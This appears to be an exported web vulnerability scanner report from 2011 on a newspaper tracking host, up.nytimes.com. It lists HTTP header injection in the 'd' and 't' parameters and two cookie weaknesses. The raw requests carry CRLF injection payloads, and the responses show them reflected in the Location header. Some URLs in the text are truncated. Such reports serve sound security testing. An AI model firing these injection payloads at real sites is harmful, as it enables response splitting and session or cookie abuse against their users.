1.1. http://up.nytimes.com/ [d parameter]
1.2. http://up.nytimes.com/ [t parameter]
2. Cookie scoped to parent domain
3. Cookie without HttpOnly flag set
Severity: | High |
Confidence: | Certain |
Host: | http://up.nytimes.com |
Path: | / |
GET /?d=d09d9%0d%0a87e1b283e8e&t=4&u=http%3A//www Host: up.nytimes.com Proxy-Connection: keep-alive Referer: http://www.heraldtribune Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 302 Found Date: Thu, 27 Jan 2011 04:16:42 GMT Server: Apache/1.3.33 (Unix) Set-Cookie: up=B1R4Ge3T20kA1oMs; domain=.nytimes.com; path=/; expires=Sat, 30-Sep-23 19:23:21 GMT Set-Cookie: ups=B1R4Ge3T20kA1oMs; domain=.nytimes.com; path=/; expires=Thu, 27-Jan-11 04:46:42 GMT Set-Cookie: zFN=B1R10B10110B00101; domain=.nytimes.com; path=/; expires=Fri, 04-May-12 03:23:21 GMT Set-Cookie: zFD=B1R10B10110B00101; domain=.nytimes.com; path=/; expires=Fri, 04-May-12 03:23:21 GMT P3P: CP="IDC DSP COR DEVa TAIa OUR BUS UNI" Cache-Control: max-age=0 Expires: Thu, 27 Jan 2011 04:16:42 GMT Location: http://up./?rdl=1&d=d09d9 87e1b283e8e&g=&a=&r=http%3a%2f Content-Type: image/gif Content-Length: 0 |
Severity: | High |
Confidence: | Certain |
Host: | http://up.nytimes.com |
Path: | / |
GET /?d=A&t=5cb81%0d%0a0046d60eaa6&u=http%3A//www Host: up.nytimes.com Proxy-Connection: keep-alive Referer: http://www.heraldtribune Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 302 Found Date: Thu, 27 Jan 2011 04:16:42 GMT Server: Apache/1.3.33 (Unix) Set-Cookie: up=B1R4Ge3T20kA1oN9; domain=.nytimes.com; path=/; expires=Sat, 30-Sep-23 19:23:21 GMT Set-Cookie: ups=B1R4Ge3T20kA1oN9; domain=.nytimes.com; path=/; expires=Thu, 27-Jan-11 04:46:42 GMT Set-Cookie: zFN=B1R10B10110B00101; domain=.nytimes.com; path=/; expires=Fri, 04-May-12 03:23:21 GMT Set-Cookie: zFD=B1R10B10110B00101; domain=.nytimes.com; path=/; expires=Fri, 04-May-12 03:23:21 GMT P3P: CP="IDC DSP COR DEVa TAIa OUR BUS UNI" Cache-Control: max-age=0 Expires: Thu, 27 Jan 2011 04:16:42 GMT Location: http://up.heraldtribune 0046d60eaa6&x=B1R4Ge3T20kA1oN9&f=> Content-Type: image/gif Content-Length: 0 |
Severity: | Information |
Confidence: | Certain |
Host: | http://up.nytimes.com |
Path: | / |
GET /?d=A&t=4&u=http%3A//www Host: up.nytimes.com Proxy-Connection: keep-alive Referer: http://www.heraldtribune Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 302 Found Date: Wed, 26 Jan 2011 20:18:26 GMT Server: Apache/1.3.33 (Unix) Set-Cookie: up=B1QKIQ3S20kA0WOG; domain=.nytimes.com; path=/; expires=Sat, 30-Sep-23 11:25:05 GMT Set-Cookie: ups=B1QKIQ3S20kA0WOG; domain=.nytimes.com; path=/; expires=Wed, 26-Jan-11 20:48:26 GMT Set-Cookie: zFN=B1Q10B10110B00101; domain=.nytimes.com; path=/; expires=Thu, 03-May-12 19:25:05 GMT Set-Cookie: zFD=B1Q10B10110B00101; domain=.nytimes.com; path=/; expires=Thu, 03-May-12 19:25:05 GMT P3P: CP="IDC DSP COR DEVa TAIa OUR BUS UNI" Cache-Control: max-age=0 Expires: Wed, 26 Jan 2011 20:18:26 GMT Location: http://up.heraldtribune Content-Type: image/gif Content-Length: 0 |
Severity: | Information |
Confidence: | Certain |
Host: | http://up.nytimes.com |
Path: | / |
GET /?d=A&t=4&u=http%3A//www Host: up.nytimes.com Proxy-Connection: keep-alive Referer: http://www.heraldtribune Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 302 Found Date: Wed, 26 Jan 2011 20:18:26 GMT Server: Apache/1.3.33 (Unix) Set-Cookie: up=B1QKIQ3S20kA0WOG; domain=.nytimes.com; path=/; expires=Sat, 30-Sep-23 11:25:05 GMT Set-Cookie: ups=B1QKIQ3S20kA0WOG; domain=.nytimes.com; path=/; expires=Wed, 26-Jan-11 20:48:26 GMT Set-Cookie: zFN=B1Q10B10110B00101; domain=.nytimes.com; path=/; expires=Thu, 03-May-12 19:25:05 GMT Set-Cookie: zFD=B1Q10B10110B00101; domain=.nytimes.com; path=/; expires=Thu, 03-May-12 19:25:05 GMT P3P: CP="IDC DSP COR DEVa TAIa OUR BUS UNI" Cache-Control: max-age=0 Expires: Wed, 26 Jan 2011 20:18:26 GMT Location: http://up.heraldtribune Content-Type: image/gif Content-Length: 0 |